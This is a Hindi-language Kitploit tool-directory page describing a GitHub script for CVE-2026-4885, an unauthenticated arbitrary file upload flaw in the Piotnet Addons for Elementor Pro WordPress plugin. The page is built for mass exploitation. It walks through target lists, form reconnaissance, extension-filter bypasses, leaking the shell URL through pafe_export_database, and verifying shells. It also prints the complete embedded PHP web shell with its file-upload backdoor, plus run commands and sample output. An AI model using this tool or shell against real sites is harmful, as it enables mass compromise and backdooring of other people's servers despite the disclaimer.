Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-4885 — Piotnet Addons for Elementor Pro <= 7.1.70 - फ़ॉर्म फ़ाइल अपलोड के माध्यम से अप्रमाणित मनमाना फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/jenderal92/cve-2026-4885
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubjenderal92/cve-2026-4885

CVE-2026-4885

Piotnet Addons for Elementor Pro <= 7.1.70 - फ़ॉर्म फ़ाइल अपलोड के माध्यम से अप्रमाणित मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
43 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-4885 – Piotnet Addons for Elementor Pro बड़े पैमाने पर शोषण

अप्रमाणित मनमाना फ़ाइल अपलोड जो Piotnet Addons for Elementor Pro ≤ 7.1.70 में दूरस्थ कोड निष्पादन (RCE) की ओर ले जाता है।

यह उपकरण बड़े पैमाने पर शोषण के लिए डिज़ाइन किया गया है – इसे लक्ष्यों की एक सूची दें, और यह स्वचालित रूप से:

  • प्लगइन संस्करण का पता लगाएं (या यदि संपत्तियाँ मिलती हैं तो कमजोर मानें)
  • post_id, form_id, और सही अपलोड फ़ील्ड नाम निकालने के लिए उन्नत टोही करें
  • कमजोर फ़िल्टर को बायपास करने के लिए कई PHP एक्सटेंशन आज़माएं (.phtml, .php3, .php4, .phps, .pht, .php2)
  • एक GIF89a‑हेडर PHP शेल अपलोड करें (अंतर्निहित, किसी बाहरी फ़ाइल की आवश्यकता नहीं)
  • pafe_export_database के माध्यम से अपलोड किए गए शेल URL को लीक करें
  • शेल निष्पादन सत्यापित करें (Logic_Internet स्ट्रिंग खोजें) और URL को shells.txt में सहेजें
  • ⚠️ अस्वीकरण
    यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।
    उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं, अवैध है।

    अधिक अस्वीकरण आप Jenderal92 के कवर पर अस्वीकरण देख सकते हैं। आप इसे यहाँ !!! देख सकते हैं।


    विशेषताएँ

    • Python 2.7 संगत (यदि आप print/input समायोजित करते हैं तो Python 3 के साथ भी काम करता है)
    • मल्टी‑थ्रेडेड – एक साथ 20 लक्ष्यों तक स्कैन और शोषण करें
    • स्मार्ट फॉर्म डिटेक्शन – Piotnet‑विशिष्ट HTML विशेषताओं को पार्स करता है (data-pafe-form-builder-field-name, data-elementor-id, आदि)
    • कोई बाहरी शेल फ़ाइल नहीं – PHP पेलोड स्क्रिप्ट में एम्बेडेड है
    • स्वचालित URL योजना – यदि गायब है तो https:// जोड़ता है
    • विस्तृत पथ सूची – इसमें 22 सामान्य फॉर्म URL शामिल हैं (/contact, /apply, /quote, /book-appointment, …)
    • लीक पैटर्न – wp-content/uploads/piotnet-addons-for-elementor/ और सीधे रूट पथ दोनों से मेल खाता है

    आवश्यकताएँ

    • Python 2.7 (या Python 3 मामूली बदलावों के साथ)
    • requests लाइब्रेरी
    root@kitploit:~
    pip install requests
    

    स्थापना

    root@kitploit:~
    git clone https://github.com/Jenderal92/CVE-2026-4885.git
    cd CVE-2026-4885
    

    उपयोग

    1. एक लक्ष्य फ़ाइल तैयार करें

    targets.txt (या कोई भी नाम) नामक एक फ़ाइल बनाएं जिसमें प्रति पंक्ति एक URL हो:

    root@kitploit:~
    https://example1.com
    example2.com
    http://vulnerable-site.org
    
    1. शोषण चलाएँ
    root@kitploit:~
    python2 CVE-2026-4885.py targets.txt
    

    स्क्रिप्ट यह करेगी:

    · प्रत्येक लक्ष्य के लिए प्रगति दिखाएगा · सफल शेल URL को shells.txt में सहेजेगा

    उदाहरण आउटपुट

    root@kitploit:~
    [*] Loaded built-in shell (598 bytes)
    [*] scanning 25 pages...
    [+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
    [*] post_id=13 form_id=fa2c60e field=file
    [*] trying .phtml
    [+] uploaded .phtml
    [+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
    [+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
    

    कमांड लाइन विकल्प (स्क्रिप्ट में अनुकूलन योग्य)

    चरविवरणडिफ़ॉल्ट
    TIMEOUTHTTP अनुरोध टाइमआउट10 सेकंड
    MAX_THREADSसमवर्ती थ्रेड्स की संख्या20
    OUTPUT_FILEसफल शेल URL कहाँ सहेजेंshells.txt
    EXT_LISTआज़माने के लिए फ़ाइल एक्सटेंशन.phtml, .php3, .php4, .phps, .pht, .php2

    आप स्क्रिप्ट के शीर्ष को संपादित करके इन्हें बदल सकते हैं।


    शेल पेलोड

    अंतर्निहित शेल है:

    root@kitploit:~
    GIF89a;
    <?php
    echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
    Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center>'.'<br>';
    if (!empty ($_FILES['uploads'])) {
        move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
        Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
    }
    ?>
    

    · सर्वर जानकारी, वर्तमान कार्यशील निर्देशिका और एक फ़ाइल अपलोड फॉर्म प्रदर्शित करता है। · इसे किसी भी अन्य PHP कोड से बदला जा सकता है (स्क्रिप्ट में केवल SHELL_CODE बदलें)।


    यह कैसे काम करता है

    1. संस्करण पहचान · प्लगइन संपत्तियों में ?ver= के लिए होमपेज खोजता है। · ज्ञात CSS/JS फ़ाइलों के अस्तित्व की जाँच करने पर वापस आता है।

    2. टोही · सामान्य फॉर्म पृष्ठों और होमपेज पर मिले सभी आंतरिक लिंक को क्रॉल करता है। · Piotnet‑विशिष्ट HTML विशेषताओं से post_id, form_id, और सही फ़ाइल अपलोड फ़ील्ड नाम निकालता है।

    3. अपलोड · wp-admin/admin-ajax.php?action=pafe_ajax_form_builder पर एक मल्टीपार्ट POST अनुरोध भेजता है। · एक JSON पेलोड का उपयोग करता है जो प्लगइन के अपलोड तंत्र का अनुकरण करता है। · EXT_LIST में सभी एक्सटेंशन तब तक आज़माता है जब तक एक सफल न हो जाए।

    4. लीक · pafe_export_database का अनुरोध करता है जो अपलोड की गई फ़ाइल का पूरा URL वाला CSV लौटाता है। · एक regex पैटर्न का उपयोग करके URL को पार्स करता है जो xxx-{random}.ext से मेल खाता है।

    5. सत्यापन · लीक किए गए URL पर जाता है। · Logic_Internet स्ट्रिंग की उपस्थिति की जाँच करता है। · सफलता पर URL को shells.txt में सहेजता है।


    समस्या निवारण

    Windows पर UnicodeEncodeError

    स्क्रिप्ट में पहले से ही एक safe_unicode() फ़ंक्शन शामिल है जो गैर‑ASCII वर्णों को संभालता है। यदि आप अभी भी त्रुटियाँ देखते हैं, तो सुनिश्चित करें कि आपका टर्मिनल UTF‑8 का समर्थन करता है:

    root@kitploit:~
    chcp 65001
    

    कोई फॉर्म नहीं मिला / सभी एक्सटेंशन विफल

    · लक्ष्य पैच किया गया हो सकता है या Piotnet Addons का उपयोग नहीं कर रहा हो। · TIMEOUT या MAX_THREADS बढ़ाने का प्रयास करें। · मैन्युअल रूप से सत्यापित करें कि प्लगइन वास्तव में स्थापित है।

    लीक विफल होता है लेकिन अपलोड सफल हुआ

    · pafe_export_database एंडपॉइंट अक्षम या सुरक्षित हो सकता है। · यह देखने के लिए ब्राउज़र में मैन्युअल रूप से /wp-admin/admin-ajax.php?action=pafe_export_database तक पहुँचने का प्रयास करें कि यह सुलभ है या नहीं।


    कानूनी और नैतिक उपयोग

    · इस उपकरण का उपयोग केवल उन प्रणालियों पर करें जिनके परीक्षण के लिए आपके पास लिखित अनुमति है। · लेखक किसी भी दुरुपयोग या हुई क्षति के लिए जिम्मेदार नहीं है। · सभी लागू कानूनों का सम्मान करें।

    टूल डाउनलोड करें